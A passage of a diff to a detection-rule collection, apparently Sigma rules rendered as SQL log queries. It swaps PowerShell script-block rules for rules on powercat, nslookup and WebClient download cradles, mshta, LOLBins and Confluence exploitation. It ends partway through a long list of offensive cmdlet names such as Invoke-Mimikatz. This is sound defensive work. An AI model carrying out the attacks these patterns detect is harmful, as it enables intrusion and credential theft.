Bencherchali (Nextron Systems)", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "status": "test", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", - "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", - "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "status": "test", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_presentationhost.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.impact", - "attack.t1565" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "status": "experimental", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "status": "experimental", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE 